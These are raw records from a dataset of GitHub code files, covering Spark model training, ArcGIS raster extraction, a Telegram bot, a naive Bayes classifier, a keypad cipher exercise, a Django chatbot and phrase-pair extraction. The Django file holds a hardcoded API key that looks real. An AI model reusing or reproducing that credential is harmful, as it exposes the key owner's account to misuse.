=RandomForestClassifier(labelCol=self.schema.target_indexed_label,\n featuresCol=self.schema.scaled_vector_input_features)\n\n logger.info(\"Creating Label generator\")\n label_generator = IndexToString(inputCol=self.schema.prediction_column_name, \n outputCol=f\"{self.schema.prediction_column_name}_{self.schema.target_column}\",\n labels=label_indexer_model.labels)\n\n stages.append(rand_forest_clf)\n stages.append(label_generator)\n pipeline = Pipeline(stages=stages)\n return pipeline\n except Exception as exp:\n raise FinanceException(exp, sys)\n \n def get_scores(self, dataframe:DataFrame, metric_names:List[str])->List[tuple]:\n try:\n if metric_names is None:\n metric_names = self.trainer_config.metric_list\n scores:List[tuple]=[]\n for metric in metric_names:\n score = get_score(metric_name=metric,\n dataframe=dataframe,\n label_col = self.schema.target_indexed_label,\n prediction_col=self.schema.prediction_column_name)\n\n scores.append((metric,score))\n\n return scores\n \n except Exception as exp:\n raise FinanceException(exp, sys)\n\n def export_trained_model(self, model:PipelineModel):\n try:\n transformed_pipeline_file_path = self.transform_artifact.exported_pipeline_file_path\n transformed_pipeline = PipelineModel.load(transformed_pipeline_file_path)\n\n # entire pipeline (DAta Transformation -> Model -> Label indexer)\n updated_stages = transformed_pipeline.stages + model.stages\n transformed_pipeline.stages = updated_stages\n trained_model_file_path = self.trainer_config.trained_model_file_path\n transformed_pipeline.save(trained_model_file_path)\n\n logger.info(\"Creating trained model directory\")\n trained_model_file_path = self.trainer_config.trained_model_file_path\n os.makedirs(os.path.dirname(trained_model_file_path), exist_ok=True)\n # transformed_pipeline.save(trained_model_file_path)\n ref_artifact = PartialModelTrainerRefArtifact(\n trained_model_file_path=trained_model_file_path,\n label_indexer_model_file_path=self.trainer_config.label_indexer_model_dir)\n\n logger.info(f\"Model trainer reference artifact: {ref_artifact}\")\n return ref_artifact\n\n except Exception as exp:\n raise FinanceException(exp, sys)\n def start_model_training(self)-> ModelTrainingArtifact:\n try:\n # 1 get Train test dataframe\n dataframes = self.get_train_test_dataframe()\n train_df, test_df = dataframes[0], dataframes[1]\n label_indexer = StringIndexer(inputCol=self.schema.target_column, outputCol=self.schema.target_indexed_label)\n label_indexer_model = label_indexer.fit(train_df)\n # save label indexer\n os.makedirs(os.path.dirname(self.trainer_config.label_indexer_model_dir), exist_ok=True)\n label_indexer_model.save(self.trainer_config.label_indexer_model_dir)\n # apply label transformation\n train_df=label_indexer_model.transform(train_df)\n test_df=label_indexer_model.transform(test_df)\n\n # 2. Get Trainer Model\n model =self.get_model(label_indexer_model)\n\n trained_model = model.fit(train_df)\n train_df_prediction = trained_model.transform(train_df)\n test_df_prediction = trained_model.transform(test_df)\n scores = self.get_scores(dataframe=train_df_prediction, metric_names=self.trainer_config.metric_list)\n \n\n # 3. trained Model\n train_metric_artifact = PartialModelTrainerMetricArtifact(f1_score=scores[0][1],\n precision_score=scores[1][1],\n recall_score=scores[2][1])\n\n\n logger.info(f\"Model trainer train metric: {train_metric_artifact}\")\n\n \n scores = self.get_scores(dataframe=test_df_prediction,metric_names=self.trainer_config.metric_list)\n \n test_metric_artifact = PartialModelTrainerMetricArtifact(f1_score=scores[0][1],\n precision_score=scores[1][1],\n recall_score=scores[2][1])\n\n logger.info(f\"Model trainer test metric: {test_metric_artifact}\")\n ref_artifact = self.export_trained_model(model=trained_model)\n model_trainer_artifact = ModelTrainingArtifact(model_trainer_ref_artifact=ref_artifact,\n model_trainer_train_metric_artifact=train_metric_artifact,\n model_trainer_test_metric_artifact=test_metric_artifact)\n\n logger.info(f\"Model trainer artifact: {model_trainer_artifact}\")\n\n return model_trainer_artifact\n except Exception as exp:\n raise FinanceException(exp,sys)","repo_name":"cr21/finanace-complaint","sub_path":"src/component/training/model_trainer.py","file_name":"model_trainer.py","file_ext":"py","file_size_in_byte":7223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35178755914","text":"# D:\\Data10\\FloodDS\\floodds.gdb\\Layers\\Catchment D:\\Data10\\FloodDS\\Layers\\fillgrid10 c:\\temp 1 1\n# D:\\Projects\\Branches\\10.3_Final\\ArcHydroTools\\srcPy\\AHMain\\Scripts\\ArcHydro>python extractraster.py D:\\Data10\\FloodDS\\floodds.gdb\\Layers\\Catchment D:\\Data10\\FloodDS\\Layers\\fillgrid10 c:\\temp 2 2\nimport sys\nimport os\nimport time \nimport datetime\nimport multiprocessing\n\nimport arcpy\nimport apwrutils\n\n\ndef trace():\n import traceback, inspect\n tb = sys.exc_info()[2]\n tbinfo = traceback.format_tb(tb)[0]\n # script name + line number\n line = tbinfo.split(\", \")[1]\n filename = inspect.getfile(inspect.currentframe())\n # Get Python syntax error\n synerror = traceback.format_exc().splitlines()[-1]\n return line, filename, synerror\n\n''' Extract raster based on polygon (ExtractByMask or ExtractByPolygon) \n the code is written to test applying multiprocessing module extract gp operation. '''\nclass ApExtractRaster:\n #variables:\n def __init__(self):\n self.DebugLevel = 0\n\n def __exit__(self, type, value, traceback):\n if((self.DebugLevel & 2) ==2):\n apwrutils.Utils.ShowMsg(self.thisFileName() + \" completed at \" + time.ctime()) \n \n def thisFileName(self):\n import inspect\n return inspect.getfile(inspect.currentframe())\n\n def getWorkspace(self, pFL):\n oDesc = arcpy.Describe(pFL)\n ooDesc = arcpy.Describe(oDesc.path)\n if(ooDesc.dataType=='FeatureDataset'):\n sWorkspace = ooDesc.path\n else:\n sWorkspace = oDesc.path\n\n return sWorkspace\n \n \"\"\" execute(self, pPolyFC, pRaster, pFolder, opType=0:ByMask,1:ByPolygon) \"\"\"\n def execute(self, pPolyFC, pRaster, pFolder, pScratchWorkspace = None, opType = 0):\n sOK = apwrutils.C_OK \n arcpy.CheckOutExtension(\"Spatial\")\n arcpy.env.overwriteOutput = True \n oDesc = arcpy.Describe(pRaster)\n sName = oDesc.name \n try:\n if(pScratchWorkspace!=None):\n arcpy.env.scratchWorkspace = pScratchWorkspace\n arcpy.AddMessage(\"pScratchWorkspace={}\".format(pScratchWorkspace))\n ds = time.clock()\n iCnt = 0\n with arcpy.da.SearchCursor(pPolyFC, [apwrutils.FN_ShapeAt, apwrutils.FN_HYDROID]) as rows:\n for row in rows:\n iCnt = iCnt + 1\n oShp = row[0]\n idPoly = row[1]\n oExt = oShp.extent\n arcpy.env.extent = oExt \n sOutName = os.path.join(pFolder, \"R{}\".format(idPoly))\n sMsg = \"\" \n try:\n if(opType==0):\n idRaster = arcpy.sa.ExtractByMask(pRaster, oShp)\n idRaster.save(sOutName)\n sMsg = \"{}. {} ExtractByMask({}, pPolygon)->{}\".format(iCnt, idPoly, sName, sOutName)\n else:\n pnt = arcpy.Point()\n pntArray = arcpy.Array() \n nParts = oShp.partCount\n lPoints = []\n for i in range(0, nParts):\n pnts = oShp.getPart(i)\n for pnt in pnts:\n lPoints.append(pnt)\n idRaster = arcpy.sa.ExtractByPolygon(pRaster, lPoints, 'INSIDE') #, 'INSIDE') #'OUTSIDE'\n idRaster.save(sOutName)\n sMsg = \"{}. {} ExtractByPolygon({}, pPolygon(of {} vertices))->{}\".format(iCnt, idPoly, sName, len(lPoints), sOutName)\n\n except:\n arcpy.AddMessage(\"id={} {}\".format(idPoly, trace()))\n\n arcpy.AddMessage(\"{}. dt={}\".format(sMsg, apwrutils.Utils.GetDSMsg(ds)))\n ds = time.clock() \n except arcpy.ExecuteError:\n sMsg = \"{} {}\".format(arcpy.GetMessages(2), trace())\n arcpy.AddError(sMsg)\n except:\n arcpy.AddMessage(trace())\n sOK = apwrutils.C_NOTOK\n\n return sOK, pFolder \n \nif __name__ == '__main__':\n #oProcessor = None\n try:\n debugLevel = 0\n inPolyFC = arcpy.GetParameterAsText(0)\n inRaster = arcpy.GetParameterAsText(1)\n pFolder = arcpy.GetParameterAsText(2)\n opType = arcpy.GetParameterAsText(3)\n nProcessors = arcpy.GetParameterAsText(4)\n \n arcpy.env.overwriteOutput = True\n try:\n opType = int(opType)\n except:\n opType = 0\n\n lProcesses = []\n try:\n nProcessors = int(nProcessors)\n except:\n nProcessors = 1\n \n\n arcpy.CheckOutExtension(\"Spatial\") \n\n ddt = time.clock()\n oProcessor = ApExtractRaster()\n oProcessor.DebugLevel = debugLevel\n #..makesure HYDROID exists and populated\n oDesc = arcpy.Describe(inPolyFC)\n oidFieldName = oDesc.oidFieldName\n sName = oDesc.name \n if(apwrutils.Utils.FieldExist(oDesc, apwrutils.FN_HYDROID)==False):\n dFields = {apwrutils.FN_HYDROID :'LONG'}\n apwrutils.Utils.addFields(inPolyFC, dFields)\n srcField = \"!{}!\".format(oidFieldName)\n arcpy.CalculateField_management(inPolyFC, flooddsconfig.FN_HYDROID, -1, \"PYTHON\") \n\n if(nProcessors==1):\n tReturns = oProcessor.execute(inPolyFC, inRaster, pFolder, None, opType)\n if(tReturns[0] == apwrutils.C_OK): \n pFolder = tReturns[1]\n arcpy.AddMessage(pFolder)\n arcpy.SetParameterAsText(4, pFolder)\n else:\n pWorkspace = apwrutils.Utils.getWorkspace(inPolyFC) \n nTotal = int(arcpy.GetCount_management(inPolyFC)[0])\n pStatTable = os.path.join(pWorkspace, \"{}_Stats\".format(sName))\n nMin = 0\n nMax = nTotal\n arcpy.Statistics_analysis(inPolyFC, pStatTable, [[oidFieldName,\"MIN\"],[oidFieldName,\"MAX\"]])\n with arcpy.da.SearchCursor(pStatTable, [\"MIN_{}\".format(oidFieldName),\"MAX_{}\".format(oidFieldName)]) as rows:\n for row in rows:\n nMin = row[0]\n nMax = row[1]\n\n #..Construct the whereclause \n #..Select the Catchments\n #..Use catchment to select the lines,\n #..Use catchment to select the 10-85 points.\n nTotal = int(arcpy.GetCount_management(inPolyFC)[0])\n dCnt = int(nTotal/nProcessors) + 1 \n nLower = 0\n nUpper = 0\n for iProcess in range(nProcessors):\n nLower = 0 + dCnt*iProcess\n nUpper = nLower + dCnt\n sWhere = \"{} > {} and {} <= {}\".format(oidFieldName, nLower, oidFieldName, nUpper) \n arcpy.AddMessage(\"sWhere={}\".format(sWhere))\n pFLPoly = \"{}{}\".format(sName, iProcess) \n arcpy.MakeFeatureLayer_management(inPolyFC, pFLPoly, sWhere) \n \n pFolderPS = os.path.join(pFolder, \"Proc{}\".format(iProcess))\n wksName = \"wks{}.gdb\".format(iProcess )\n pwks = os.path.join(pFolderPS, wksName) \n apwrutils.Utils.makeSureDirExists(pFolderPS)\n pwks = os.path.join(pFolderPS, wksName) \n if(arcpy.Exists(pwks)==False):\n arcpy.CreateFileGDB_management(pFolderPS, wksName) #arcpy.CreateFileGDB_management(sCurDir, sWKS)\n arcpy.AddMessage(\"FWKS: {} is created.\".format(pwks))\n else:\n arcpy.Delete_management(pwks)\n arcpy.AddMessage(\"FWKS: {} is deleted.\".format(pwks)) \n arcpy.CreateFileGDB_management(pFolderPS, wksName) #arcpy.CreateFileGDB_management(sCurDir, sWKS)\n arcpy.AddMessage(\"FWKS: {} is created.\".format(pwks))\n\n pFCPolyProc = os.path.join(pwks, \"{}_{}\".format(sName,iProcess )) \n arcpy.CopyFeatures_management(pFLPoly, pFCPolyProc) \n \n ds1 = time.clock()\n arcpy.AddMessage(\"running extractraster.execute({} {} {} {})\".format(pFCPolyProc, inRaster, pFolder, pwks))\n params = (pFCPolyProc, inRaster, pFolder, pwks, opType) \n oProcessor.DebugLevel = debugLevel\n p = multiprocessing.Process(target=oProcessor.execute, args=params)\n lProcesses.append(p) \n p.start() \n \n \n if(nProcessors>1): \n for p in lProcesses:\n print(\"{} joined\".format(str(p)))\n p.join()\n\n while len(multiprocessing.active_children()) > 0:\n nProc = len(multiprocessing.active_children())\n sMsg = \"Current active processes={}, {}\".format(nProc, datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n arcpy.AddMessage(sMsg) \n for actProcess in multiprocessing.active_children():\n dt = (time.clock() - ds)\n dt = round(dt,2)\n arcpy.AddMessage(\" {} dt={}\".format(str(actProcess), dt ))\n time.sleep(interval) \n \n \n except arcpy.ExecuteError:\n print (str(arcpy.GetMessages(2)))\n arcpy.AddError(str(arcpy.GetMessages(2)))\n except:\n print (trace())\n arcpy.AddError(str(trace()))\n arcpy.AddError(str(arcpy.GetMessages(2)))\n finally:\n if(oProcessor!=None):\n del oProcessor\n arcpy.AddMessage(\"Total processing time dt={}\".format(apwrutils.Utils.GetDSMsg(ddt)))\n dt = datetime.datetime.now()\n print ('Finished at ' + dt.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n\n\n","repo_name":"zye4252264/ArcHydro-FloodDS","sub_path":"FDS201704202055/srcPy/Scripts/ArcHydro/extractraster.py","file_name":"extractraster.py","file_ext":"py","file_size_in_byte":9980,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"14239647963","text":"import logging\n\nfrom handlers.dataHandler import DataHandler\nfrom telebot.types import Location\nfrom telebot.types import Venue\nlogger = logging.getLogger()\nimport support.geocode as gserv\n\nclass LocationDataHandler(DataHandler):\n\n def handleData(self, bot, message, response):\n venue=message.venue\n location=message.location\n alamat=message.text\n outvenue=None\n logger.debug('inside handle data')\n\n if location is None and venue is None and alamat is not None:\n logger.debug('do geo coding')\n #get reverse geo coding from Alamat\n outgps=gserv.getLatLng(alamat)\n if outgps['lat']==gserv.errorLat and outgps['lng']==gserv.errorLng:\n outalamat=alamat+' (tidak dikenal)\\n(mungkin beda di peta)'\n else:\n outalamat=alamat\n locationTemp=Location(outgps['lng'],outgps['lat'])\n outvenue=Venue(locationTemp,'',outalamat,None)\n message.venue=outvenue\n elif (venue is not None and location is not None):\n outvenue=venue\n logger.debug('venue is sent')\n elif (venue is not None and location is None):\n outvenue=venue\n logger.debug('venue is sent')\n elif (location is not None and venue is None):\n #get geocoding\n outgps=gserv.getAddress(location.latitude,location.longitude)\n outalamat=outgps\n outvenue=Venue(location,'',outalamat,None)\n # outvenue={'location':location,'alamat':'GPS saya'}\n # logger.info('alamat is added to location')\n elif (alamat is None and location is not None and venue is None):\n locationTemp=Location(-6.311525,106.829285)\n outvenue=Venue(locationTemp,'','tidak diketahui',None)\n # location={'latitude':-6.311525 , 'longitude':106.829285}\n # outvenue={'location':location,'alamat':'not specified'}\n logger.info('venue is synthesized')\n self.dbhandler(bot,message , outvenue, response)\n\n def dbhandler(self, bot,message , outvenue, response):\n pass\n","repo_name":"indosandi/sanfrabot","sub_path":"handlers/locationDataHandler.py","file_name":"locationDataHandler.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"32656778775","text":"import numpy as np\nimport re\nimport random\n\n'''词表到向量的转换函数'''\ndef loadDataSet():\n postingList = [\n ['my', 'dog', 'has', 'flea', 'problems', 'help', 'please'],\n ['maybe', 'not', 'take', 'him', 'to', 'dog', 'park', 'stupid'],\n ['my', 'dalmation', 'is', 'so', 'cute', 'I', 'love', 'him'],\n ['stop', 'posting', 'stupid', 'worthless', 'garbage'],\n ['mr', 'licks', 'ate', 'my', 'steak', 'how', 'to', 'stop', 'him'],\n ['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']\n ]\n classVec = [0, 1, 0, 1, 0, 1] # 1 is abusive, 0 not\n return postingList, classVec\n\n\n'''词汇列表'''\ndef createVocabList(dataSet):\n vocabSet = set([]) # create empty set\n for document in dataSet:\n vocabSet = vocabSet | set(document) # union of the two sets\n return list(vocabSet)\n\n\n'''获取词向量'''\ndef setOfWords2Vec(vocabList, inputSet):\n returnVec = [0] * len(vocabList)\n for word in inputSet:\n if word in vocabList:\n returnVec[vocabList.index(word)] = 1\n else:\n print(\"the word: %s is not in my Vocabulary!\" % word)\n return returnVec\n\n\n'''朴素贝叶斯训练函数'''\ndef trainNB0(trainMatrix, trainCategory):\n numTrainDocs = len(trainMatrix)\n numWords = len(trainMatrix[0])\n pAbusive = sum(trainCategory) / float(numTrainDocs)\n p0Num = np.ones(numWords); p1Num = np.ones(numWords) # change to 1 for np.log()\n print(\"p0Num=\", p0Num)\n print(\"p1Num=\", p1Num)\n p0Denom = 0.0; p1Denom = 0.0\n for i in range(numTrainDocs):\n if trainCategory[i] == 1:\n # print(\"p1Num=\", p1Num, \" p1Denom=\", p1Denom)\n p1Num += trainMatrix[i]\n p1Denom += sum(trainMatrix[i])\n print(\"p1Num=\", p1Num, \" p1Denom=\", p1Denom, \" sum mat i=\", sum(trainMatrix[i]))\n else:\n # print(\"p0Num=\", p0Num, \" p0Denom=\", p0Denom)\n p0Num += trainMatrix[i]\n p0Denom += sum(trainMatrix[i])\n print(\"p0Num=\", p0Num, \" p0Denom=\", p0Denom, \" sum mat i=\", sum(trainMatrix[i]))\n p1Vect = np.log(p1Num/p1Denom) # change to np.log()\n p0Vect = np.log(p0Num/p0Denom) # change to np.log()\n return p0Vect, p1Vect, pAbusive\n\n\n'''朴素贝叶斯分类函数'''\ndef classifyNB(vec2Classify, p0Vec, p1Vec, pClass1):\n p1 = sum(vec2Classify * p1Vec) + np.log(pClass1)\n p0 = sum(vec2Classify * p0Vec) + np.log(1.0 - pClass1)\n if p1 > p0:\n return 1\n else:\n return 0\n\ndef testingNB():\n listOPosts, listClasses = loadDataSet()\n myVocabList = createVocabList(listOPosts)\n trainMat = []\n for postinDoc in listOPosts:\n trainMat.append(setOfWords2Vec(myVocabList, postinDoc))\n for mat in trainMat:\n print(\"trainMat=\", mat)\n p0V, p1V, pAb = trainNB0(np.array(trainMat), np.array(listClasses))\n testEntry = ['love', 'my', 'dalmation']\n thisDoc = np.array(setOfWords2Vec(myVocabList, testEntry))\n print(\"testEntry=\", testEntry, \" classified as: \", classifyNB(thisDoc, p0V, p1V, pAb))\n testEntry = ['stupid', 'garbage']\n thisDoc = np.array(setOfWords2Vec(myVocabList, testEntry))\n print(\"testEntry=\", testEntry, \" classified as: \", classifyNB(thisDoc, p0V, p1V, pAb))\n\n\n'''朴素贝叶斯词袋模型'''\ndef bagOfWords2VecMN(vocabList, inputSet):\n returnVec = [0] * len(vocabList)\n for word in inputSet:\n if word in vocabList:\n returnVec[vocabList.index(word)] += 1\n return returnVec\n\n'''文件解析'''\ndef textParse(bigString):\n listOfTokens = re.split(r'\\w*', bigString)\n return [tok.lower() for tok in listOfTokens if len(tok) > 2]\n\n\n'''垃圾邮件分类'''\ndef spamTest():\n docList = [], classList = [], fullText = []\n for i in range(1, 26):\n wordList = textParse(open('email/spam/%d.txt' % i).read())\n docList.append(wordList)\n fullText.extend(wordList)\n classList.append(1)\n wordList = textParse(open('email/ham/%d.txt' % i).read())\n docList.append(wordList)\n fullText.extend(wordList)\n classList.append(0)\n vocabList = createVocabList(docList)\n trainingSet = range(50); testSet = []\n for i in range(10):\n randIndex = int(random.uniform(0, len(trainingSet)))\n testSet.append(trainingSet[randIndex])\n del(trainingSet[randIndex])\n trainMat = []; trainClasses = []\n for docIndex in trainingSet:\n trainMat.append(setOfWords2Vec(vocabList, docList[docIndex]))\n trainClasses.append(classList[docIndex])\n p0V, p1V, pSpam = trainNB0(np.array(trainMat), np.array(trainClasses))\n errorCount = 0\n for docIndex in testSet:\n wordVector = setOfWords2Vec(vocabList, docList[docIndex])\n if classifyNB(np.array(wordVector), p0V, p1V, pSpam) != classList[docIndex]:\n errorCount += 1\n print(\"the error rate is: \", float(errorCount) / len(testSet))\n\n\n'''RSS源分类器及高频词去除函数'''\ndef calcMostFreq(vocabList, fullText):\n import operator\n freqDict = {}\n for token in vocabList:\n freqDict[token] = fullText.count(token)\n sortedFreq = sorted(freqDict.items(), key=operator.itemgetter(1), reverse=True)\n return sortedFreq[:30]\n\ndef localWords(feed1, feed0):\n import feedparser\n docList = [], classList = [], fullText = []\n minLen = min(len(feed1['entries']), len(feed0['entries']))\n for i in range(minLen):\n wordList = textParse(feed1['entries'][i]['summary'])\n docList.append(wordList)\n fullText.extend(wordList)\n classList.append(1)\n wordList = textParse(feed0['entries'][i]['summary'])\n docList.append(wordList)\n fullText.extend(wordList)\n classList.append(0)\n vocabList = createVocabList(docList)\n top30Words = calcMostFreq(vocabList, fullText)\n for pairW in top30Words:\n if pairW[0] in vocabList:\n vocabList.remove(pairW[0])\n trainingSet = range(2 * minLen); testSet = []\n for i in range(20):\n randIndex = int(random.uniform(0, len(trainingSet)))\n testSet.append(trainingSet[randIndex])\n del(trainingSet[randIndex])\n trainMat = []; trainClasses = []\n for docIndex in trainingSet:\n trainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))\n trainClasses.append(classList[docIndex])\n p0V, p1V, pSpam = trainNB0(np.array(trainMat), np.array(trainClasses))\n errorCount = 0\n for docIndex in testSet:\n wordVector = bagOfWords2VecMN(vocabList, docList[docIndex])\n if classifyNB(np.array(wordVector), p0V, p1V, pSpam) != classList[docIndex]:\n errorCount += 1\n print(\"the error rate is: \", float(errorCount)/len(testSet))\n return vocabList, p0V, p1V\n\n\n'''最具表征性的词汇显示函数'''\ndef getTopWords(ny, sf):\n import operator\n vocabList, p0V, p1V=localWords(ny, sf)\n topNY = [], topSF = []\n for i in range(len(p0V)):\n if p0V[i] > -6.0 :\n topSF.append((vocabList[i], p0V[i]))\n if p1V[i] > -6.0 :\n topNY.append((vocabList[i], p1V[i]))\n sortedSF = sorted(topSF, key=lambda pair: pair[1], reverse=True)\n print(\"SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**\")\n for item in sortedSF:\n print(item[0])\n sortedNY = sorted(topNY, key=lambda pair: pair[1], reverse=True)\n print(\"NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**\")\n for item in sortedNY:\n print(item[0])\n\n\n# postList, classList = loadDataSet()\n# myVocabList = createVocabList(postList)\n# print(myVocabList)\n# print(setOfWords2Vec(myVocabList, postList[0]))\n# trainMat = []\n# for postinDoc in postList:\n# trainMat.append(setOfWords2Vec(myVocabList, postinDoc))\n# print(\"trainMat=\\n\", trainMat)\n# p0Vect, p1Vect, pAbusive = trainNB0(trainMat, classList)\n# print(\"p0Vect=\", p0Vect, \"\\np1Vect=\", p1Vect, \"\\npAbusive=\", pAbusive)\ntestingNB()\n","repo_name":"zrfan/mlGuide","sub_path":"code/mLInAction/Bayes/bayes.py","file_name":"bayes.py","file_ext":"py","file_size_in_byte":7852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"37895801109","text":"# coding=utf-8\n\"\"\"\n题目描述\n密码是我们生活中非常重要的东东,我们的那么一点不能说的秘密就全靠它了。\n哇哈哈. 接下来渊子要在密码之上再加一套密码,虽然简单但也安全。\n假设渊子原来一个BBS上的密码为zvbo9441987,为了方便记忆,\n他通过一种算法把这个密码变换成YUANzhi1987,这个密码是他的名字和出生年份,\n怎么忘都忘不了,而且可以明目张胆地放在显眼的地方而不被别人知道真正的密码。\n他是这么变换的,大家都知道手机上的字母:\n1--1, abc--2, def--3, ghi--4, jkl--5, mno--6, pqrs--7, tuv--8 wxyz--9, 0--0,\n就这么简单,渊子把密码中出现的小写字母都变成对应的数字,数字和其他的符号都不做变换,\n\n声明:密码中没有空格,而密码中出现的大写字母则变成小写之后往后移一位,如:X,先变成小写,再往后移一位,不就是y了嘛,简单吧。记住,z往后移是a哦。\n\n输入描述:\n输入包括多个测试数据。输入是一个明文,密码长度不超过100个字符,输入直到文件结尾\n\n输出描述:\n输出渊子真正的密文\n\n示例1\n输入\n复制\nYUANzhi1987\n输出\n复制\nzvbo9441987\n\"\"\"\n\n# 方法一\nwhile 1:\n try:\n s = input()\n result = []\n for c in s:\n if c in 'abc':\n result.append('2')\n elif c in 'def':\n result.append('3')\n elif c in 'ghi':\n result.append('4')\n elif c in 'jkl':\n result.append('5')\n elif c in 'mno':\n result.append('6')\n elif c in 'pqrs':\n result.append('7')\n elif c in 'tuv':\n result.append('8')\n elif c in 'wxyz':\n result.append('9')\n elif c.isupper():\n if c == 'Z':\n result.append('a')\n else:\n result.append(chr(ord(c) + 1).lower())\n else:\n result.append(c)\n print(''.join(result))\n except:\n break\n\n\n# 方法二\nd = {\n \"abc\": 2,\n \"def\": 3,\n \"ghi\": 4,\n \"jkl\": 5,\n \"mno\": 6,\n \"pqrs\": 7,\n \"tuv\": 8,\n \"wxyz\": 9,\n\n}\nwhile True:\n try:\n a, res = input(), \"\"\n for i in a:\n if i.isupper():\n if i != \"Z\":\n res += chr(ord(i.lower()) + 1)\n else:\n res += \"a\"\n elif i.islower():\n for j in d.keys():\n if i in j:\n res += str(d[j])\n break\n else:\n res += i\n print(res)\n\n except:\n break\n","repo_name":"susebing/HJ108","sub_path":"pass/HJ21 简单密码破解.py","file_name":"HJ21 简单密码破解.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72058626703","text":"from django.shortcuts import render\r\nfrom django.http import JsonResponse\r\nimport openai\r\n\r\nopenai_api_key = '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'\r\nopenai.api_key = openai_api_key\r\n\r\ndef ask_openai(message):\r\n response = openai.Completion.create(\r\n model = \"text-davinci-003\",\r\n prompt = message,\r\n max_tokens = 150,\r\n n = 1,\r\n stop = None,\r\n temperature = 0.7,\r\n )\r\n# Create your views here.\r\ndef chatbot(request):\r\n if request.method == 'POST':\r\n message = request.POST.get('message')\r\n response = 'HI THIS IS MY RESPONSE'\r\n return JsonResponse({'message':message,'response': response})\r\n return render(request, 'chatbot.html')","repo_name":"sarthakboy/Chat-webapp","sub_path":"chatbot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5346986721","text":"# phrase pair extractor\n\n\"\"\"\nBy Michael Cabot (6047262) and Sander Nugteren (6042023)\n\"\"\"\n\n#import argparse\nfrom collections import Counter\nimport sys\n\ndef conditional_probabilities(phrase_pair_freqs, \n l1_phrase_freqs, l2_phrase_freqs):\n \"\"\"Calculate the conditional probability of phrase pairs in both directions.\n \n Keyword arguments:\n phrase_pair_freqs -- counter of phrase pairs\n l1_phrase_freqs -- counter of phrases in language 1\n l2_phraes_freqs -- counter of phrases in lanuage 2\n \n Returns 2 dictionaries mapping a phrase pair to P(l1 | l2) and P(l2 | l1)\n \"\"\"\n l1_given_l2 = {}\n l2_given_l1 = {}\n for phrase_pair, freq in phrase_pair_freqs.iteritems():\n l1_given_l2[phrase_pair] = float(freq) / l1_phrase_freqs[phrase_pair[0]]\n l2_given_l1[phrase_pair] = float(freq) / l2_phrase_freqs[phrase_pair[1]]\n\n return l1_given_l2, l2_given_l1\n\ndef phrase_probabilities(phrase_freqs):\n \"\"\"Calculate the probability of a phrase.\n \n Keyword arguments:\n phrase_freqs -- counter of phrases\n \n Returns a dictionary mapping a phrase to its probabilitly\n \"\"\"\n freq_sum = sum(phrase_freqs.values())\n phrase_probs = {}\n for phrase, freq in phrase_freqs.iteritems():\n phrase_probs[phrase] = float(freq) / freq_sum\n\n return phrase_probs\n\ndef lexical_probabilities(phrase_pair_freqs,l1_word_given_l2,l2_word_given_l1,alignments):\n \"\"\"Calculate the lexical probability of a phrase given phrase in the second language .\n \n Keyword arguments:\n phrase_pair_freqs -- counter of phrases\n l1_word_given_l2 -- words probabilities\n alignments -- dictionary of words alignments for every phrase\n \n Returns two dictionaries mapping a phrase pair to its probability\n \"\"\"\n l1_lexical_given_l2= {}\n l2_lexical_given_l1={}\n for phrase_pair, freq in phrase_pair_freqs.iteritems():\n words_l1= phrase_pair[0].split()\n words_l2= phrase_pair[1].split()\n aligns=alignments[phrase_pair]\n result=1\n for word1 in words_l1:\n sumOf=0\n iterations=0\n for word2 in words_l2:\n pair=word1,word2\n if pair in aligns:\n sumOf+=l1_word_given_l2[pair]\n iterations+=1\n result*=sumOf/iterations\n l1_lexical_given_l2[phrase_pair]=result \n l2_lexical_given_l1[phrase_pair]=result \n #phrase_probs[phrase_pair] = float(freq) / freq_sum\n\n return l1_lexical_given_l2,l2_lexical_given_l1\n \n\ndef joint_probabilities(l1_given_l2, l2_phrase_probs):\n \"\"\"Calculate the joint probability of a phrase pair:\n P(l1, l2) = P(l1 | l2) * P(l2)\n \n Keyword arguments:\n l1_given_l2 -- dictionary mapping a phrase pair (l1,l2) to its\n conditional probability P(l1 | l2)\n l2_phrase_probs -- dictionary mapping a phraes to its probability\n \n Return a dictionary that maps a phrase pair to its joint probability\n \"\"\"\n joint_probs = {}\n for phrase, prob in l1_given_l2.iteritems():\n joint_probs[phrase] = prob * l2_phrase_probs[phrase[1]]\n\n return joint_probs\n\ndef add_phrase_alignment(collection, phrase, max_length,\n l1_length, l2_length):\n \"\"\"Add a phrase alignment to a collection if:\n - its length is smaller or equal to the max length\n - the alignment is a contituent of the sentences\n \n Keyword arguments:\n collection -- a list or set\n phrase -- a 4-tuple (min1,min2,max1,max2) denoting the range of\n the constituents in language 1 and 2\n max_length -- the maximum length of a phrase in the phrase alignment\n l1_length -- the length of the sentence in language 1\n l2_length -- the length of teh sentence in language 2\n \"\"\"\n if phrase and phrase[2] - phrase[0]+1 <= max_length \\\n and phrase[3] - phrase[1]+1 <= max_length \\\n and phrase[0] >= 0 and phrase[1] >= 0 \\\n and phrase[2] < l1_length and phrase[3] < l2_length:\n if isinstance(collection, list):\n collection.append(phrase)\n elif isinstance(collection, set):\n collection.add(phrase)\n else:\n return NotImplemented\n\ndef extract_phrase_pair_freqs(alignments_file, language1_file,\n language2_file, \n max_length = float('inf')):\n \"\"\"Extract and count the frequency of all phrase pairs given an\n alignment between sentences.\n \n Keyword arguments:\n alignments_file -- file that contains the alignments\n language1_file -- file containing sentences from language 1\n language2_file -- file containing sentences from language 2\n max_length -- maximum length of phrase pairs\n \n Returns counter of phrase-pairs, counter of phrases in language1\n and counter of phrases in 